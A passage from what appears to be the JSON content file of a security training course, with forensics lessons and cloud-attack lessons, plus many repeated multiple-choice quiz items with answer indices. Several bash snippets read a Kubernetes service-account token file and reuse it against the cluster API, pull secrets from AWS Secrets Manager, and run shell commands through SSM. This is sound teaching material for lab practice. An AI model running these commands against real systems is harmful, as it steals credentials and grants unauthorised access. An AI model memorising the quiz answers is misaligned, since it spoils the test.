report."},{"type":"quiz","q":"EXIF data can reveal...","opts":["File contents","GPS location, camera model, author, and software used","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-sleuthkit","cat":"Forensics & IR","title":"Sleuth Kit Forensic Tools","diff":2,"xp":150,"intro":"Command-line forensic tools for disk analysis.","sections":[{"type":"text","content":"Command-line forensic tools for disk analysis."},{"type":"code","lang":"bash","content":"mmls evidence.dd  # partition layout\nfls evidence.dd  # file listing (including deleted)\nicat evidence.dd inode_number > recovered_file  # extract file by inode"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"fls shows...","opts":["Only existing files","All files including deleted entries (marked with *)","Only directories","Only metadata"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-wireshark-analysis","cat":"Forensics & IR","title":"Wireshark Protocol Analysis","diff":2,"xp":150,"intro":"Deep protocol analysis and stream reconstruction.","sections":[{"type":"text","content":"Deep protocol analysis and stream reconstruction."},{"type":"code","lang":"bash","content":"# Follow TCP stream: right-click > Follow > TCP Stream\n# Extract files: File > Export Objects > HTTP\n# Statistics > Protocol Hierarchy\n# Statistics > Conversations\n# Display filter: http.request contains 'password'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Wireshark's 'Follow TCP Stream' reconstructs...","opts":["Individual packets","The complete conversation between two hosts","DNS queries only","Only HTTP"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-fo-ole-analysis","cat":"Forensics & IR","title":"Malicious Office Document Analysis","diff":3,"xp":200,"intro":"Analyze Office documents for macros and embedded objects.","sections":[{"type":"text","content":"Analyze Office documents for macros and embedded objects."},{"type":"code","lang":"bash","content":"olevba malicious.doc\noledump.py malicious.doc\n# Check for: AutoOpen, Auto_Open, Document_Open macros\n# Check for: PowerShell, WScript, Shell, CreateObject"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"olevba detects...","opts":["Network traffic","VBA macros and suspicious keywords in Office documents","File permissions","Registry changes"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"g-cl-aws-s3-acl","cat":"Cloud & Container","title":"S3 ACL Analysis","diff":2,"xp":150,"intro":"Check and exploit S3 bucket access control lists.","sections":[{"type":"text","content":"Check and exploit S3 bucket access control lists."},{"type":"code","lang":"bash","content":"aws s3api get-bucket-acl --bucket target-bucket\naws s3api get-bucket-policy --bucket target-bucket\n# Check for: AllUsers, AuthenticatedUsers"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AllUsers in S3 ACL means...","opts":["Only the owner","Anyone on the internet (public access)","Only IAM users","Only the region"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-aws-ssm","cat":"Cloud & Container","title":"AWS Systems Manager Exploitation","diff":3,"xp":200,"intro":"Execute commands on EC2 instances via SSM.","sections":[{"type":"text","content":"Execute commands on EC2 instances via SSM."},{"type":"code","lang":"bash","content":"aws ssm send-command --instance-ids i-xxx --document-name 'AWS-RunShellScript' --parameters 'commands=[\"id\"]'\naws ssm describe-sessions --state Active"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"SSM allows...","opts":["S3 access","Remote command execution on EC2 without SSH","Database queries","DNS management"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-aws-secrets","cat":"Cloud & Container","title":"AWS Secrets Manager Enumeration","diff":2,"xp":150,"intro":"Discover and retrieve stored secrets.","sections":[{"type":"text","content":"Discover and retrieve stored secrets."},{"type":"code","lang":"bash","content":"aws secretsmanager list-secrets\naws secretsmanager get-secret-value --secret-id prod/db-password"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Secrets Manager stores...","opts":["IAM policies","Application secrets (API keys, database passwords, tokens)","EC2 instances","S3 objects"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-k8s-dashboard","cat":"Cloud & Container","title":"K8s Dashboard Exploitation","diff":2,"xp":150,"intro":"Access the Kubernetes dashboard for cluster control.","sections":[{"type":"text","content":"Access the Kubernetes dashboard for cluster control."},{"type":"code","lang":"bash","content":"kubectl get svc -A | grep dashboard\n# If exposed without auth:\ncurl https://dashboard-ip/api/v1/namespaces\n# Or with skip-login enabled:\n# Full cluster access without authentication"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"An unprotected K8s dashboard gives...","opts":["Read-only access","Full cluster control (create/delete pods, read secrets)","Only logging","Only metrics"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"g-cl-k8s-token","cat":"Cloud & Container","title":"K8s Service Account Token Abuse","diff":3,"xp":200,"intro":"Use mounted service account tokens for API access.","sections":[{"type":"text","content":"Use mounted service account tokens for API access."},{"type":"code","lang":"bash","content":"cat /var/run/secrets/kubernetes.io/serviceaccount/token\ncurl -k -H \"Authorization: Bearer $(cat token)\" https://kubernetes.default/api/v1/namespaces\nkubectl --token=$(cat token) auth can-i --list"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public 